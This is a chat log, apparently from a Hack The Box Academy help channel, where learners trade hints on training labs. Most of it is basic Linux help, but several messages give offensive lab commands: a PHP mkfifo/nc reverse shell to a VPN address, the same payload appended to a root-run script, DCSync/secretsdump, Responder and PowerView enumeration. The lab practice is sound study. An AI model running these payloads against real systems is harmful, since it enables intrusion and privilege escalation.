#modules
it says head cannot open n3
I don't think I do, but I also can't see how many cubes this modules requires
Could also be an ad-blocker thing
If you don't have the cubes, you can't enroll
I'm gonna have an aneurysm at this point
Yep, this was the issue. For some reason Brave browser just doesn't return anything when I click the button
😩
Yep you can disable ad-blocker for htb as they don't serve ads
@charred fable
Head -n3 isn't meant to be run on its own
I'm telling you to pipe the apt list command, into head -n3
As I typed out here
The first thing it says after the warning
should I google how to run the head -n3 or can you tell me ?
the command head just returns the first lines of an output. the flag -n3 returns the first three lines
Yes
I'm just more frustrated by the lack of comprehension, as I said it multiple times
Of an input* btw
thank you
Pipe just takes the stdout of a command and makes it the stdin of the following command
most commands support this
@acoustic owl ^
I hope you can feel my frustration second-hand payload
apt list --installed | head -n3 ?
...if only I said that earlier
You really need to pay attention more: I said it a couple times, but yes
ok but that dont show me the correct answer

It's not meant to show you the correct answer
It's meant to show you why it's giving you the wrong answer
One of the lines there stands out as not a package doesn't it
strange
it shows me 3 , 2 installed
Mhm and the first line?
no it shows me 2

and both are installed
No, it's showing you 3 lines total
All 3 of those lines are in the output that wc is counting
ok but Its showing me 2
3 lines but its 2
Do me a favor
Pipe that to wc -l
Just do that
So apt list --installed | head -n3 | wc -l
Maybe that'll help it click
Correct
i use 'apt list --installed | wc -l' and listed 738, but wrong answer
I swear to God, if you don't read up in this chat rn to go through the explanation why it's wrong
So. Something is being counted extra
Perhaps the line above the first "installed" item
ok me too. I get 738
There's two options now to get the right answer, both involve grep
I will explain how you get the correct answer
One involves grep -v [first line of the incorrect output]
Or grep "specific word"
Both will give you the right answer
I'm going to have breakfast, then I'll be back lol
The above steps I pointed out illustrate why the answer is wrong
thank you
The warning message isn't counted in wc
As its displayed even though you piped it
dpkg -l | grep '*ii' | wc -l
that gave me the correct answer
I dont understand it but thats what gave me the right answer
If you don't understand it then break it down per command in the pipeline, start with dpkg -l
Warning you should probably do dpkg -l | more
So you don't have a screen full of a bunch of stuff
And can look through it easier
I'm trying to walk you through how you can get apt to get you the same answer
At least letting you use your brain to make connections yourself
yes but the problem is that I dont get the same answer
Back to this step, what do you think the "specific word" is
I dont know can you please tell me
Use your brain
What's the common thing with the output when you used head
If you can't learn to figure stuff out on your own, you're gonna have a really rough time in-general with learning
thats why Im here trying learn and get some help
Yes, but you're not always gonna have someone to basically spell it out for you
At some point you gotta stand on your own
I've given you 99% of the information/how to get the information
I didnt understand your explanation
It's up to you to get the last 1%
You have all available info to figure out the missing pieces
I told you to use head as a quick way to evaluate the output given to you
bump for any tips
Sorry we drowned your request out
I think it's asking for the keyword here without brackets
And maybe the semicolon?
This question is about writing the right keyword in the rule. The module explains where exactly the user agent is transmitted. This term is searched for
we can see that; this isn't a gen chat
apt list --installed | head -n3 | wc -l
didnt work ,, what did I do wrong then ?

because you don't wc -l that output
k ik
read #welcome to find out how to access more of the server
Sometimes it is difficult to explain something to someone. Maybe you just can't find the right words so that the other person understands it the way you meant it.
this was meant to show you that even though you only see 2 lines that are installed, it's counting 3 lines, so something is off about it
meaning you need to look at the output and engage your brain
Hello everyone !
I am in the ADCS attack module and I have been in trouble for 3 hours with ESC11
I did exactly what room showed. I got hashes but it was wrong I decided to check I login with pth when I check hostname was "LAB-DC"
But room asking WS01
I couldn't know how to target WS01 can anyone help me?
If I follow ESC11 I am taking lab-dc's hashes not WS01
apt list --installed | head -n3 | ?
didnt work either
don't pipe to anything else
just apt list --installed | head -n3 you see 2 things installed and one other line
that one other line is why the output is incorrect
ok its shows me those 3. and that is not the correct answer
so you need to filter the apt list --installed with grep
head is not used for the final answer
it's purely just for ease of evaluating output
instead of needing to scroll up/down the terminal to find something
head -n3 just shows the first 3 lines of output
bro i was looking for a way to get it to show me the right answer
and your way wasnt the correct way

it didnt show me 737
i'm trying to help you figure it out on your own
i'm deliberately not telling you the full answer
wow
apt list --installed | grep "something" | wc -l
will it show me 737 ?
you need to replace "something" with a different word
what word will give me 737 ?
this is why i'm not telling you the direct answer; because you don't understand why
apt list --installed | head -n5 look for a common word in that output
and that's what you'll replace it with
i gave you a longer list this time so you can work it out on your own
you should have been able to do this on your own if you used any bit of braincells i originally thought you had
I already held your hand far longer than i normally would have
just be glad I'm bored
otherwise i would have given up long ago
especially since you already got the answer (using a different method that you also didn't bother to try and understand)
this doesn't mean I have found the right word 😩
like i said
use your brain, i'm starting to lose more faith with each time you come back that you have one
so it wont show me the correct answer or what do you mean ?
so apt list --installed gives you a close answer, but not the right one
how can the other way show me the correct answer and not the way you are showing
what is the common word in all the installed packages
installed automatic ?
word not words
installed
👍
this explains the dpkg output one
in short though ii for dpkg means installed
which is why i was waiting to explain it
ok but why dont apt show me 737 ?
if you grep for the right word, you'll get 737
:) like i said it's just one step away
ok Ill try it lets see
apt list --installed | grep "right word" | wc -l will give it to you
I'm doing the memory forensics module in Intro to Digital Forensics and ive been stumped on whats the process of using volatility for the last question
Examine the file "/home/htb-student/MemoryDumps/Win7-2515534d.vmem" with Volatility. Enter the Pid of the process that loaded zlib1.dll as your answer.
Furthest i've gotten really is checking the handles and grepping for zlib1.dll to find it at C:\ProgramData\ggzstcat367\TaskData\Tor\zlib1.dll
vol.py -f Win7-2515534d.vmem --profile=Win7SP1x64 dlllist -p <pID> | grep zlib
surely there's a better approach than me running dlllist on every process ID?
haha now I really got it
now it will stick for sure
once again thank you for your patience
User-Agent is a header in the HTTP GET method; in a Log4Shell exploitation attempt the payload is embedded within the user agent. I've got the URI which is put in the user-agent, still it's not the right answer. I feel like I'm in a rabbit hole
hi! I'm going through the module:Introduction to Active Directory
I'm stuck on a simple question, either I'm not translating the question correctly through the translator, or I'm writing it wrong..?
What role ensures that objects in a domain are not assigned the same SID?(full name)
It's not about finding the string, but about telling the rule where to look.
Look again in the module to see exactly how you do this. You are absolutely right with your explanation above.
The module is easy, but due to the fact that the language and the translation itself can be crooked, it’s just trash))
k, thanks, ill do that
Can anyone tell me the answer? I write: Relative ID (RID) Master
Says it's not the right answer(
got it, great thanks for help
Can any one help me in BROKEN AUTHENTICATION
Predictable Reset Token
Try it without || „(RID)“||
Without knowing exactly what the problem is, it will be difficult to help you
Thank U)
I try different thing with the script but I don't know If i am missing something in the script
Due to the fact that the translation is a little bit bitty, the cost of 1.5 hours is spent on this)
You may need to use a different tool to translate.
If it doesn't work, something is wrong 🤷♂️
Can I dm you with the script
Hi everyone, I am not sure if this is the right place but I am taking the new learning path called senior web penetration tester and I am taking a module called injection attacks, I got stuck on the skill assessment the final challenge, if anyone is familiar and finished this module please DM me here in discord. thank you so much 🙂
Hey, guys I'm currently stuck on the first question on the Skills Assessment section of Intro to Assembly. I figured the second question out but I've been stumped on this one for a few days now. Any pointers in the right direction would be much appreciated 👍
sure
why has my thread on digital forensics been deleted? bs i cant get any help with a single question
python3 -c 'import pty;pty.spawn("/bin/bash")'
You mean this?
@analog dock ah yes.. ty
module 18, section 80 for linux fundamentals
help in last question
curl in website "https://www.inlanefreight.com" and filter all unique paths of that domain
i did use curl "site" | wc -l
what's command for filter "all unique paths"??
i need help on the module Windows Privilege Escalation: Interacting with Users, i setup the responder and put the scf file in the share, but i did not get the hash of the SCCM_SVC user, he never call back to my responder
nvm lol, i reset the box and now i got the hash
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
what am I doing wrong, I typed
ss -l -4 | grep "LISTEN" | grep -v "127" | wc -l
Hi, i have been doing cybersecurity and ctfs for the better part of a year now and i have just recently made my mind up to start bug hunting on Intigriti, but what i have realised is that the whole thing is very hard and confusing, so i am writing this message to maybe get some tips and tricks and also to connect with somebody that is willing to help me
see "man ss", its help me
Hey, my question is about optional task in "Target Function" in "Introduction to Whitebox Pentesting" module. I can't see console.log output in DEBUG CONSOLE.
You can see my breakpoints and payload on the following photos.
Payload:
curl -s -X POST -H "Content-Type: application/json" -H "Authorization: Bearer <token>" -d '{"text":"\"console.log(\"hello\")\""}' http://localhost:5000/api/service/generate
thanks
SECURITY MONITORING & SIEM FUNDAMENTALS --> Introduction To The Elastic Stack -->Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Discover". Then, click on the calendar icon, specify "last 15 years", and click on "Apply". Finally, choose the "windows*" index pattern. Now, execute the KQL query that is mentioned in the "Comparison Operators" part of this section and enter the username of the disabled account as your answer. Just the username; no need to account for the domain.
I only get the usernames ||administrator and Administrator|| but both are not correct. Anyone a nudge?
feel free to dm, but I remember there was a code they searched for where a disabled account attempted login, did you use that in your query? It's been a while for me
I'm trying to do Windows Attacks & Defense > Coercing Attacks & Unconstrained Delegation, I am trying to follow along but stuck at the first command. When i run Get-NetComputer -Unconstrained | select samaccountname i get a few blank lines under samaccountname. What am i doing wrong? The command works, but i get a blank output instead of the results in the example. I'm sure i could skip this step but it feels I am missing something if i can't identify which systems are configured for Unconstrained Delegation.
did you import powerview?
yeah
try Get-NetComputer -Unconstrained | gm -Type Properties
weird, open another terminal, import and run it again
tried that, or do you mean the command you just gave me
yeah seems like it didn't get imported properly
I think you're right, I had to run this before running that to import it:
Import-Module .\PowerView.ps1
can I get a sanity check..
find / rockyou.txt
should find where the file rockyou.txt exists in pwnbox right?
that's what i ran. I just restarted WS001 and still have the same result
Did you run this before:
Import-Module .\PowerView.ps1
is PowerView in the downloads folder?
find the folder where powerview is before running that command, since it uses relative path
yeah, i have PowerView.ps1 and PowerView-main.ps1
okay folks, I need a small hint on Command Injection (https://academy.hackthebox.com/module/109/section/1042) module final assessment. I guess the smallest hint I could ask for is, ||is the method which can be injected a GET or POST command?||
On previous modules PowerView has worked fine
If you've successfully imported both Powerview scripts, and if you already tried resetting, there's not much else I can think of to help
you can use locate which finds all files with names containing the string
locate rockyou
idk about pwnbox but it might not have the full rockyou available
I've just tried importing PowerView-main.ps1 again after the reboot and now it is working and i get the result as well as the errors in your screenshot (which i assume are nothing to worry about)
damn, locate worked like a charm.
have you used the find command before? maybe Im forgetting to use a switch or something (it's been a while). Thx, appreciate it :))
rockyou on pwnbox:
/usr/share/wordlists/rockyou.txt
find needs more filter since by default it's case sensitive and look for full match, this would be similar to the locate command
find / -type f -iname '*rockyou*' 2>/dev/null
locate is also way faster btw since it uses a pre indexed db to search for files
Thank you. Now I know what was up.
I tried find / --iname rockyou.txt but it threw a fit cus I used --, it's supposed to be -...
so find / -iname rockyou.txt worked... also... 2>/dev/null, so simple, beautiful. (redirects error to null) thx
get
thanks!
Hey folks, I'm trying to get local user groups for a service account as practicing the HTB Active Directory module
any pointers of any tool that can do it apart ldap from the attack machine ? Could not find a way with CME or enum4linux or rpcclient
you want to find the groups the user belongs to?
What powerful local group on the Domain Controller is the SAPService user a member of?
that's the challenge I need to complete to validate the module
also I can't winRM to target it seems 🙂
you can use cme:
nxc -M groupmembership
here it's netexec, the updated fork of cme
hi
Hello. Can anyone give a hint for this question from Active Directory Enumeration and Attacks, Skills Assessment Part 1?
I have got svc_sql user. But, can not find a path for local administrator on MS01 host
thanks mate
it's also in the GetUserSPNs.py output btw, but nxc is another way
Might try this way then because can't install nxc on the jumpbox and i'm lazy to tunnel from my own box 🙂
the jumpbox should have cme installed, same commands
Ah I get it now, groupmembership is not in the help because it's a module
you can list modules with -L
Yes, the cme version on the box seems too old and does not have this module. Anyway, went thru via GetUserSPN 🙂
thx @next bronze
oh yeah my cme also doesn't have it, interesting
try to access ms01 with that user
Yeah I've read about CME that is going to be available only for paying contributors or something like that and netexec seems the way to go now
haha yeah a little more complicated than that but close, all the active devs moved to netexec
which do you prefer gnome or xfce? (kali linux)
personaly I don't use the UI 😄
I am running responder for a task and was wondering would I use tun0 or would I use my ligolo adapter when using it?
Whatever interface you think would provide the details you need
how do i delete my credit card information
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
What did I do wrong ? I typed
curl https://www.inlanefreight.com | tr "'"" "\n" | grep "www.inlanefreight.com/" | sort -u | wc -l
and Its showed me 0
Then walk your command back to see where it breaks
Hi guys on the module Active Directory enumeration & attacks #ACL enumeration, the last question is buggued because the machine crash everytime, someone can give me the answer please ?
Bro in Login Brute Forcing at the Service Authentication Brute Forcing section I successfully brute forced the password for the user for the ssh (following the steps given) and I simply cannot ssh into that user with the target address at all.
The steps say just to use ssh to connect to it and attempt the password. However, I am not able to ever attempt to enter the password I have gathered and it asks me if I would like to continue connecting, after typing yes it will just forever tell me permission denied. I am stuck due to what seems to be a technical error. It's upsetting because this section isn't even hard I'm just facing a bug or something.
Power shell can’t handle the command for me + a friend + multiple person according to the forum.
I tried
curl "https://www.inlanefreight.com"
It said cannot resolve host https://www.inlanefreight.com
probably DNS issue then
Add it into your /etc/hosts
Inlanefreight.com doesn't need to be added lol
It's a .com domain, it's on public root servers
how ?
If I'm not mistaken, you can only access AD / Windows boxes through the jumphost. You need to ssh to the jumpbox, which will go through tun0 interface, but I don't think running responder on your local machine will ever work in the academy scenario
Ignore, they're incorrect about needing to do so
ok
Just finished attacking applications with ffuf - one of the questions required a recursive scan with a large wordlist with multiple file extensions which took well over 30 minutes. -t allows us to set the number of threads from the default of 40. Previously I have been using gobuster with -t 100 - what would be a good thread number to use for ffuf to speed up a very large recursive scan with multiple file extensions?
Ligolo is a pivoting tool
I had a pivot set up
ok my bad sorry 🙂 Then should use that one 😄
you can use bloodhound for this
Be wary bc too many threads on a live target may cause you to get temp blocked, or DoS the site
I tried but the info doesn’t appear, even in the « extra properties »
Why?
you can try changing the rate using the option -rate
what Im I doing wrong then ?
afaik ligolo can't forward smb traffic, you either need to use chisel or run responder on the jump host
I read it too fast I said that I made a mistake
out of curiosity, is ligolo better/easier than chisel ?
You are on the free plan or paid monthly plan from academy
paid
If free: pwnbox has limited internet access
Thank you. - good point for real engagements. How about for HTB - would there be a similar problem?
ah okay yea that makes sense now.
I thought ligolo was able to do it all. I should have read more into it
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces it's been a while but this should help you find the right one
try adding -s ¯\_(ツ)_/¯
Part of responder relies on broadcast traffic I think, and you won't likely be able to forward that broadcast traffic over a pivoting tool
at least the poisoning part
that could explain why I didnt get a hit
i accidentally added an exam voucher that i can't afford and am not ready for. will the exam be bought as soon as i get enough money in my credit card, and if yes does anyone know how do i cancel that?
Message support on the site
whats their email ?
Anyone have any idea about my problem? It sucks to be stuck on something that seems out of my control. The module indicates I should be allowed to attempt to ssh and should not get permission denied
customerops@hackthebox.com is it this
Need to speak to a person? Learn how to reach our support via HTB Labs.
also yes.
Didnt help 😩
Did you solve it?
can you visit in a browser on the pwnbox ¯\_(ツ)_/¯
Up
if ssh, try ssh -vvv to see where it hangs
yes
I'll need to check that, give me a sec
okay this is quite weird, I tried writing alternative commands which would work in theory but doesn't return the right results, pretty sure the first time I did this module is using the commands given in the section but it indeed takes a long time to run. anyways here's the alternative commands that should work, but not in this case since some ACE are missing from the output and I can't be asked to find out why
Get-DomainObjectAcl -Identity "GPO Management" | Where-Object { $_.SecurityIdentifier -eq (Get-ADUser 'forend').SID.Value }
$gpogrpsid = Convert-NameToSid "GPO Management"; (Get-ADUser -Filter "Name -like 'forend'").DistinguishedName | ForEach-Object { Get-DomainObjectAcl -SearchBase $_ -SearchScope Subtree } | where { $_.SecurityIdentifier.value -eq $gpogrpsid }
since none of those works, the answer is in bloodhound, it's not the exact same name so check this link to find which should be the answer
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces
Thank you a lot for the time you dedicated to it im really grateful for that
has anyone completed the dnsadmin section in the windows privilege escalation module? i seem to be running into an issue
i manage to add myself to the group, but cant see the flag or remove the value in the registry. i verified i am part of the domain admins group
np, also why I prefer remote tools tbh, this will get you the answer
nxc ldap 172.16.5.5 -u htb-student -p 'Academy_student_AD!' -M daclread -o TARGET='GPO Management'
compared to whatever mess that was earlier
I have a quick question, I finish all the free Basics Pen Testing Tier 0 section of the HTB Labs.. I'm thinking about putting that in my resume as projects, I'm wondering if there is a better way to add it to my resume?
If anyone have any ideas please let me know
i would just put in you work on hack the box modules in your resume under "free time" or mention it in a quick summary about yourself
@tiny mauve
try to log out and log back in, but if you can add yourself to DA, you can just get the flag
try using the revshell method
bruh... I didn't do the ffuf module. lame
ig I'll be trying to find where the wordpress site is on
it's right in front of you 
I'll get it eventually lol
Shells and Payloads, Assessment
i have found the file upload vuln, but it is mentioned there is a second upload vuln, i think its ||tomcat_mgr_upload||can someone verify if its the right one bc i want to test both.
Host-01
there are 2 upload vulns
Hey All, I'm struggling with the end of Nibbles. I had the reverse shell working, but it's not working anymore and I don't know what to do. I don't really know how I lost the reverse shell, or why it's not working anymore. I keep going over my steps and I can't figure out what's wrong. Any help greatly appreciated.
When I upload the PHP test file I can see that I have code execution, but then when I try to update it with my vpn ip and port with the provided one-liner to run the reverse shell, I get nothing. It worked before... idk what I'm doing wrong.
Thanks for your help, glad this is a good resource.
you’re welcome man, now you know it works on my machine think about why it doesn’t work on your machine

I'm just gonna block you if you're here to troll around.
cmon now
what's in your php revshell
Hey all - Looking to get some help if possible.
I'm doing the Javascript Deobfuscation skills assesment and hit a part where I'm stuck on the following question
Try to Analyze the deobfuscated JavaScript code, and understand its main functionality. Once you do, try to replicate what it's doing to get a secret key. What is the key?
I've got all the answers, but when looking, I don't see any key in the deobfuscated code which I haven't already used as an accepted answer...
EDIT: Oh, my bad. I missed over the fact of what I used to get the final answer! 😄
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.23 42068 >/tmp/f'); ?>
is that your ip and are you listening on that port?
that's the ip of my vpn connection, and yes I'm listening on that port
└──╼ $nc -lvnp 42068
listening on [any] 42068 ...
did you curl the revshell
hm, reset the target and try again
I wouldn't consider htb learning as a project
yes but i asked if the msf module is the correct one
try it
Alright, thanks.. @median kettle @fathom pendant
I dont get why I'm not seeing my posts in here now 😦
Is there like a character limit or something?
can I DM you regarding this wordpress thing?
Resetting the target worked, but I'm still stuck at the very end...
I setup the HTTP server and see the GET /LinEnum.sh HTTP/1.1 200 posting.
running wget .../LinEnum.sh worked.. I then chmod +x'd LinEnum, and then ran ./LinEnum.sh That all worked.
sure
I made a monitor.sh.bak to be safe, then ran echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.23 42069 >/tmp/f' | tee -a monitor.sh
it's because the output is being parsed by the bot as spam
if you verify your account it'll likely stop it from being dumb
Then I run sudo /home/nibbler/personal/stuff/monitor.sh and I get
unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found (x3)
Did I miss something? I don't see root.txt anywhere
try sudo bash /home/nibbler/personal/stuff/monitor.sh
UGH the machine stopped working again!!! just like last time!!!
this is very frustrating 😦
also: do you have your listener set up on the right port?
How do I verify my account so I can stop getting rate limited when asking for help?
Yes, I keep getting to this point and then it stops working because I'm probably taking too long or something idk
it's not tied to taking any specific amount of time
well it keeps needing me to restart it and redo the exact same things to work.
If you're not going to be helpful, don't say anything?
Really. Just not what I'm here for.
i'm telling you: what you're doing appears to be correct - and works fine when I do it
Yes, that doesn't help anyone at all.
creating a new file wasn’t necessary
I have to keep respawning it. That's the problem
I cant get to the end before it stops working
it's part of the recommendation to create a backup file
like working on a live engagement
when you ping the machine do you have stable ping or is it all over the place
wouldn’t he be creating it under the context of a non-root user
the file itself isn't a root file
afaik
all under 10ms
i forget if you need to also chmod +x the monitor.sh file
stable.
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
How can I see the "unique paths". ?? before starting filterering
I typed curl "https://www.inlanefreight.com".
and I got alot text
haven't done that section, but I assume it would involve grep? or one of those fancy sed things I don't know how to use 😅
it does involve grep
:P and tr iirc
curl grabs the source-code - you need to narrow that down to get the answer
yes but I mean before that. how do you know what to look for
what is the unique here ?
"unique" means one-of-a-kind
no duplicates
there's a sort option that filters unique stuff
-u
your initial command should work pretty well 
^
the command you posted way earlier should work
you got caught up for whatever reason your curl wasn't recognizing the site
now that sounds fixed
It's possible you have multiple vpn connections established. Maybe you have pwnbox and VPN or two VPN in different shells/windows
Yes I was targeting, so I stopped that and then I could open curl
but now im tryna figure out the filters
again: the command you pasted a while ago
if you don't understand a command there's always the man command to help fill gaps
so i verified the dll was successful, im in the domain admin group, ran gpupdate /force and logged out then back in. i still get access denied
can someone help? i been on this section for weeks now
Which module are you talking about?
windows privilege escalation, the section where you abuse dnsadmin privileges
oh same as me man, I kept going on with the remaining sections, but when I retry it I wanna try adding myself to the local admin group to read the flag, also since thats the DC you could dcsync and with DA, or you could grab the actual admin hash and psexec to the box - again these are things I wanna try since it kept saying I dont have permissions to read the flag
ive tried adding myself to the local admin account but it doesnt work.
ive also tried changing admin password through cmd on admin mode but i still get denied. managed to upload a backdoor but couldnt get system level access
try to dcsync?
secretsdump
completely forgot about that
It happens XD
You could also use mimikatz, but the privileges problem might affect it, i plan to try secretsdump after I finish the module.
If you're domain admin and have creds, you can psexec to connect to the domain if the restarting doesn't work for you
Also I noticed you said you logged out, try restarting also
restarting the machine?
No
also secretsdump.py doesnt seem to work
Hi, I'm on the second lab of the AD Enumeration module, trying to get the admin flag on the SQL01 host. ||I have a shell as mssqlsvc on the SQL01 host, and I identified the seImpersonate privilege enabled. I'm trying to download PrintSpoofer.exe to this machine in order to exploit it but it doesn't let me download anything to the box|| Any suggestions?
I don't recall exactly the approach, but there are likely file transfer methods that would work. What have you tried?
I have a powershell revshell, so I tried Invoke-WebRequest Client.DownloadFile etc
It seems like any time I add an output option to the command it just doesn't execute
for example, I tried running wget like: ||wget http://IP:port/exploit.exe and I get a hit on my python webserver, but if I run wget http://IP:port/exploit.exe --output exploit.exe it doesn't make a request to the webserver||.
I've tried smb but with no success, I'll try ftp as well. Thanks!
For smb, if it's open and you haven't tried I've found more success if I mount the smb network share with username and password.
I've started the smb server from the parrot attack machine: ||sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData ./|| and try to mount from ||SQL01 revshell using: net use X: \172.16.7.240\CompData || I don't get any error on the command but I don't see the ||X:|| share
you don't need to use the net use command, just copy what you want out from the share
cp \\ip\CompData\file
and make sure that host can reach the am server
I tried it first, I see that the user authenticates successfully but I don't get any file on the revshell session
Is anyone down to give me a sanity check on "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download."
I found something, it isn't working, just checking if I'm making a silly mistake or if I'm way off
This is in the Hacking Wordpress module
I ran: ||copy \\172.16.7.240\CompData\blabla.exe temp.exe|| and I see ||[*] User SQL01\SQL01$ authenticated successfully [*] SQL01$::INLANEFREIGHT:<SNIP> [*] Closing down connection (172.16.7.60,53881)|| But I don't have any file on the revshell host
you need an output location lol
copy \\IP\CompData\file.exe temp.exe like this?
yea
Doesn't work as well 😦
I don't remember this but should be in the wpscan output
any errors?
No, I get the output on the smb server that the client authenticated successfully and I get no error on client side
That's why I'm clueless
that's not possible, if there's no error then the file is copied, check the directory properly
There's not a file present, Idk. Both dir and ls don't show anything
Is the file in the hosted smb server
Yeah
The syntax for net use seems wrong, usually it's net use X: \\IP\shareLocation (missing a \). Also, just to exhaust try creating the share with creds: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData . -user {some username} -password {some password} then mount with net use X: \\IP\shareLocation /user:{some username} {some password}. Then you can try copy X:\filename path\filename
Are AD labs down? Been trying to get one to come up for over a half an hour!
I guess I answered my question. Not down, just takes 40 min to get in after resetting the machine multiple times!
👍
And after all of that the supplied mimikatz wont work!
hmm something is up... my hacking wordpress instance is coming on and off every once in a while... assuming they're having some issues... oh being ddos who know
Understanding Log Sources & Investigating with Splunk
Introduction To Splunk & SPL
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.
I found the answer but haven't used what the hint told me and my query doesn't show me the good account with the most login attempts. If someone can dm me I can show my query but i'm not sure to understand this one
idk the question is weird
it's asking what users made logins attempt ONLY within 10 minutes... and from those, what had the most logons
I'm stuck on the Attacking Common Services Hard lab, last question.
||I already impersonated the correct user, can interact with the linked sql server but when I try to retrieve the flag using EXECUTE('SELECT * FROM OPENROWSET(BULK ''C:/Users/Administrator/Desktop/flag.txt'', SINGLE_CLOB) AS Contents') AT [LOCAL.TEST.LINKED.SRV]; I'm getting a memory allocation failure error. Am I on the wrong track here? ||
Edit: Nvm got it to work, ||I was using sqsh on my Kali box thought I should at least try to RDP into the client and try it from sqlcmd and that worked, not sure why but I'm not complaining.||
Yeah I know I did something for that but I still don't get the good answer can I dm you ?
sure you can dm
it works when I put the address on the browser... so I already have the answer... just curious why the curl didn't work
curl -X GET http://blog.inlanefreight.local/wp-content/themes/twentysixteen/404.php?cmd=ls /home/x/
I'm guessing it's something about the space between ls and /home, but I added a ` in the beginning and end and it didn't fix
tbh I already got the answer so I'm moving on... but if anyone got any ideas that would be cool
Is there a way to search an entire module for a text string? For example if I wanted to search the entire Windows Privilege Escalation module for the string 'pass the hash', is there a way to do that?
For the Windows Privilege Escalation module Pillaging, for the Optional Exercises what are you supposed to submit? There is no flag on the Administrators desktop.
on active subdomain enumeration in information gathering web edition, im really stuck on the following. i have no clue what to do. ive tried digging inlanefreight.htb with the target ip as the nameserver, digging the nameserver itself, etc. i put the ip linking to inlanefreight.htb in the /etc/hosts file.
What is the FQDN of the IP address 10.10.34.136?
What FQDN is assigned to the IP address 10.10.1.5? Submit the FQDN as the answer.
Submit the number of all "A" records from all zones as the answer.
if someone could just give me a small pointer or idea of what to try next that would be much appreciated.
I've been trying for almost an hour to connect to the AD lab for Credentialed Enumeration - from Linux. Not able to connect. I get an IP address when I spawn the machine, but cannot SSH or ping the address. I've tried connecting through all the US VPN servers (TCP and UDP), resetting the connection, terminating the box, refreshing my browser then starting again. Nothing seems to work.
Url encode the command, that makes it „ls+/home/x“. If you have a space in curl without enclosing the parameter in „“ it will be seen as two parameters
So it thinks the url ends after ls and another starts with /home/x
thanks @tranquil axle I appreciate the clarification, so add a + instead of a space, and wrap everything around in quotes. beautiful :)))
On the attacking wordpress module, skills assessment portion. I'm trying to gain a shell via msfconsole but it says it is unable to upload the payload. I have the username and password via wpscan. I also tried RCE but it wont let me upload the code. Am I missing something?
your lhost is wrong
but that doesn't seem to be the only issue, idk I've never used that msf module
"I also tried RCE but it wont let me upload the code. "
be patient, try different themes... It may be a permission thing, or a server is pooping thing.
I had to spend 40 minutes waiting on the server deciding to function or not for it to work
I ended up not using msfconsole
What do you mean you waited 40 minutes for the server to decide to function or not?
That when I pressed the edit button. Change apply. It would fail.
I did eventually try another theme. But every once in a while the server would go down. Aka you go to the address and website won't load.
Wait a few minutes and It comes back
Im on the "permission management" why cant I spawn on my pwd box anymore ? I want to login in to htb_student but there is no Spawn button and I cant see the IP ?
it was the same on the page before
and when I go back 2 pages and take the IP from there it doesnt work on the "permission management" page
pwnbox or target? some sections won't have a target
i meant target
ok, /etc/ssh/sshd_config didnt work so I thought I could depend on that
you can do those questions without a target, in pwnbox or your own vm
allright Ill try that
I'm trying to do the Web Proxies module (on firefox), but when clicking on the spawn target button, it loads for a moment then goes back to the text asking me to click on it. I've cleared my cookies, and relogged in but still happening. Oddly, each time I click on it I get Cookie “__cf_bm” has been rejected because it is already expired. a few times in console. My system time is correct, so not quite sure what that could be. Any ideas on what could be causing this?
same seems to happen in chromium sans the cookie console warns
clear cookies?
yup, cleared them a few times. no dice:(
does the academy vpn have to be on to spawn the target, or just interact with it?
no you don't need vpn to spawn the target
Hey, I still can't get the file on the ||SQL01 machine|| second lab of AD module. I think there are no errors showing at all on this shell, because even when I write invalid commands I don't get any errors showing
are you using a scuffed shell?
What other shell can I get on it?
||powershell revshell initiated by xp_cmdshell||
I'll try it, thanks!
help please
I want to Search for all lines that contain a word that starts with Permit.
the page only shows me how to (a) [a-z] {1,10} \ .*
Why do you need to look for that?
thats the exercise
Section?
regular expressions
Also you need to learn how to adapt given information on your own
Ah, I skipped over this as it wasn't required
Im not trying to skip anything because Im new to all of this and I need to learn it
Think how you'd grep for a word: then modify that
grep -E "(Permit|permit)" /etc/passwd
I think * should be there somewhere but dont know how or where
Except that's not the exercise
The exercise is to do it against the sshd_config file
grep -i permit
in regex the reserved character for "start with" is ^
I thought that was start of line? Unless I'm misreading the prompt. Which is likely, bc it is worded weirdly, to sound like "words that start with Permit"
hmm dont know the exact case here
That's the phrasing
But there's no actual answer-box to confirm correct vs incorrect cases/amount
grep -E "(Permit|permit)" sshd_config. ?
Use the full path of the sshd_config file from the section
/etc/ssh/sshd_config
Thanks! I will try that.
grep -E "(Permit|permit)" /etc/ssh/sshd_config
But it might be the case where you need to do grep -E "^Permit"
ok Ill try
Or something like that
hey does anyone else have the issue compiling exploits on your own machine to putting on target GLIBC error
but when compiling on the HTB attack machine works fine??
Because if you don't statically compile it links to your glib version, which is likely different on the target
didnt work it showed nothing
i Tried
grep -E "(Permit|permit)" /etc/ssh/sshd_config
grep -E "(^Permit|permit)" /etc/ssh/sshd_config
Try putting the ^ before the quotes
didnt work
when I try
/etc/ssh/sshd_config
It says permission denied
and with sudo command not found
Ah
It's because it doesn't actually start with Permit
The start of the line has a #
Hello i m doing Linux fundamental module im stuck in the find and files directories section.
To solve the first question :
" What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?"
i tried the command : find -type f -newermt 2020-03-03 -size -28k -size +25k
i have the Vscodium output file but it's the only file and it's the wrong answer
grep -E "Permit.*\s"
Hint: you're not ssh to the target
i tried on the target machine but i have no output
doesn't find require the path? otherwise it'll start its search from where you are (currently htb-student's home dir), which wont be an awful lot
